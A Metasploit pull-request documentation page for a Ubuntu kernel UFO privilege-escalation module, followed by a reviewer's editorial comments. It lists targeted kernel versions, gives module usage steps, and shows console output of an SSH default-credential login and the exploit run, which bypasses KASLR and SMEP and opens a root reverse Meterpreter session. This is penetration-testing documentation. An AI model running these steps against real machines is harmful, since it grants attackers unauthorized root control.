Land #9884, add linux ufo priv esc module
@@ -0,0 +1,136 @@
## Vulnerable Application
This module attempts to gain root privileges on Linux systems by abusing UDP Fragmentation Offload (UFO).
The bug was initially introduced in October 2005 and patched in September 2017, potentially affecting a large
number of kernels; however this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels
4.4.0-21 <= 4.4.0-89 (Trusty), and 4.4.0-81 <= 4.8.0-58 (Xenial), including Linux distros based on Ubuntu
such as Linux Mint.
### Disabling SMAP
[Original Instructions](https://github.com/rapid7/metasploit-framework/pull/9884#issuecomment-389607805)
To disable `SMAP` on a system, edit `/etc/default/grub` and add `nosmap` to the `GRUB_CMDLINE_LINUX_DEFAULT` line.
Next, `sudo update-grub`, and reboot.
To verify SMAP has been disabled, `grep smap /proc/cpuinfo` and nothing should be returned.
## Verification Steps
1. Start msfconsole
2. Get a shell on a vulnerable box
3. Do: ```use exploit/linux/local/ufo_privilege_escalation```
4. Do: ```set session [#]```
5. Do: ```run```
6. You should get a root shell.
## Options
**WritableDir**
A folder we can write files to. Defaults to /tmp
**COMPILE**
If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to Auto
## Compiled Executables
The module makes use of a pre-compiled exploit executable to be
used when `gcc` is not available on the target host for live compiling,
or `COMPILE` is set to `False`.
The executable was cross-compiled with [musl-cross](https://s3.amazonaws.com/muslcross/musl-cross-linux-6.tar).
```bash
./x86_64-linux-musl-gcc -o exploit.out -pie -static exploit.c
```
## Scenarios
### Ubuntu 14.04.5 4.4.0-31-generic x64 Desktop
#### Initial Access
```
resource (ubuntu.rb)> use auxiliary/scanner/ssh/ssh_login
resource (ubuntu.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (ubuntu.rb)> set username ubuntu
username => ubuntu
resource (ubuntu.rb)> set password ubuntu
password => ubuntu
resource (ubuntu.rb)> exploit
[+] 2.2.2.2:22 - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare) Linux ubuntu-desktop-14 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (1.1.1.1:45819 -> 2.2.2.2:22) at 2018-04-03 20:58:32 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
#### Escalate
In this scenario, gcc is installed so we can live compile on the system.
```
msf5 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/ufo_privilege_escalation
msf5 exploit(linux/local/ufo_privilege_escalation) > set verbose true
verbose => true
msf5 exploit(linux/local/ufo_privilege_escalation) > set session 1
session => 1
msf5 exploit(linux/local/ufo_privilege_escalation) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf5 exploit(linux/local/ufo_privilege_escalation) > exploit
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444
[+] Linux kernel version 4.4.0-31-generic is vulnerable
[*] Checking if SMAP is enabled ...
[+] SMAP is not enabled
[+] System architecture x86_64 is supported
[+] Unprivileged user namespaces are permitted
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Writing '/tmp/.4UnI1EFL.c' (28356 bytes) ...
[*] Max line length is 65537
[*] Writing 28356 bytes in 2 chunks of 57414 bytes (octal-encoded), using printf
[*] Next chunk is 43454 bytes
[*] Writing '/tmp/.S6G2g9rnUj' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 2.2.2.2
[*] [.] starting
[*] [.] checking kernel version
[*] [.] kernel version '4.4.0-31-generic' detected
[*] [~] done, version looks good
[*] [.] checking SMEP and SMAP
[*] [~] done, looks good
[*] [.] setting up namespace sandbox
[*] [~] done, namespace sandbox set up
[*] [.] KASLR bypass enabled, getting kernel addr
[*] [.] trying /proc/kallsyms...
[*] [.] trying /boot/System.map-4.4.0-31-generic...
[*] [-] open/read(/boot/System.map-4.4.0-31-generic)
[*] [.] trying syslog...
[*] [~] done, kernel addr: ffffffff81000000
[*] [.] commit_creds: ffffffff8109d760
[*] [.] prepare_kernel_cred: ffffffff8109da40
[*] [.] SMEP bypass enabled, mmapping fake stack
[*] [~] done, fake stack mmapped
[*] [.] executing payload ffffffff8104516a
[*] [~] done, should be root now
[*] [.] checking if we got root
[*] [+] got r00t ^_^
[*] Cleaning up /tmp/.S6G2g9rnUj and /tmp/.4UnI1EFL ...
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:60474) at 2018-07-21 13:35:49 -0400
meterpreter > sysinfo
Computer : 2.2.2.2
OS : Ubuntu 14.04 (Linux 4.4.0-31-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```
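Review bot: The kernel version ranges in the Vulnerable Application paragraph, "4.4.0-21 <= 4.4.0-89 (Trusty), and 4.4.0-81 <= 4.8.0-58 (Xenial)", are written as comparisons rather than from/to ranges, and the Xenial one runs from a 4.4.0 kernel up to a 4.8.0 kernel, which looks like a typo for a 4.8.0-xx lower bound; please restate both as explicit "4.4.0-21 through 4.4.0-89" style ranges and check them against the version check the module performs (the transcript shows "[+] Linux kernel version 4.4.0-31-generic is vulnerable"). Smaller points: the verification steps wrap commands in inline triple backticks (```use exploit/linux/local/ufo_privilege_escalation```) where single backticks are the convention in these docs; step 6 promises "a root shell" while the scenario ends in "Meterpreter session 2 opened", so "a root session" would match the transcript; the "[!] SESSION may not be compatible with this module." line in the Escalate output is left unexplained, so a sentence on why the module still proceeds with a command shell session would save readers a question; and the Disabling SMAP section reads as a step of the exploit procedure, while it actually describes preparing a test target to satisfy the "[+] SMAP is not enabled" precondition the module checks, so a one-line lead-in saying so would make the structure clearer.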